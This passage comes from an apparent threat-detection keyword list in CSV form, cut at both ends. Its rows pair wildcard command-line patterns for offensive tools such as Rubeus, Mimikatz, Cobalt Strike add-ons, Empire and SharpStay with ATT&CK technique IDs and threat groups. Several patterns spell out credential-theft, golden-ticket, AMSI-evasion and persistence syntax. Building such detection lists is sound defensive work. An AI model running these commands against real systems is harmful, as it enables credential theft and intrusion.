- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /PID:* /KILL*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -* /pwdsetafter:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /pwdsetbefore:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /rc4opsec *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /s4uproxytarget*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /s4utransitedservices*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /service:krbtgt *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /simple * /spn*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket:* /autoenterprise *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /ticket:*.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* /user:* /domain:* /aes256:* /run:powershell.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /user:* /domain:* /ntlm:* /run:powershell.exe*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory),T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*,offensive_tool_keyword,AD exploitation cheat sheet,Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection),T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* /usetgtdeleg *,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* \Temp\blah.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* | Find-AmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* | Test-ContainsAmsiSignatures*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,0,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -* > \\127.0.0.1\ADMIN$\__* 2>&1,offensive_tool_keyword,malware,Destructive Malware targeting organizations,T1486 T1059,TA0008,N/A,N/A,Ransomware,https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* > Wi-Fi-PASS*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* 0.0.0.0:8080 --threads*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -* 1.2.3.4:8080*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,0,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -* 4444 meter,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* 4444 shell,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -* '46993522-7D77-4B59-9B77-F82082DE9D81' *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* -64 -format=bof *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -64 -format=dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -64 -format=service-dll *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -a 1 -f *.dll -p http*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,0,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -* -a bruteforce *,offensive_tool_keyword,Sitadel,Web Application Security Scanner,T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001,TA0001 - TA0007 - TA0043 - TA0002 - TA0003,N/A,N/A,Network Exploitation tools,https://github.com/shenril/Sitadel,1,0,N/A,N/A,6,516,111,2020-01-21T14:59:40Z,2018-01-17T09:06:24Z -* -a nightmare*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* -a spoolsample*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -* -a -t titleFixed='Supershell - Inject' -t disableLeaveAlert=true -t disableReconnect=true ssh -J rssh:*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -* -a -t titleFixed='Supershell - Shell' -t disableLeaveAlert=true ssh -J rssh:*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -* aad3b435b51404eeaad3b435b51404ee*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* acarsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -accepteula -nobanner -d cmd.exe /c *,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Exploitation Tools,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -* --access-token*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* acltoolkit*,offensive_tool_keyword,acltoolkit,acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses,T1222.001 - T1222.002 - T1046,TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/zblurx/acltoolkit,1,0,N/A,N/A,2,108,14,2023-02-03T10:27:45Z,2022-01-12T22:45:49Z -* --action exports --dll C:\Windows\System32\amsi.dll*,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -* action=BackdoorLNK *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=CreateService servicename=* command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=ElevatedRegistryKey keyname=Debug keypath*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=ElevatedUserInitKey command=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=JunctionFolder dllpath=*.dll guid=*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -"* action=NewLNK filepath=*"" lnkname=*",offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -* action=ScheduledTask taskname=* command=*runasuser*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation 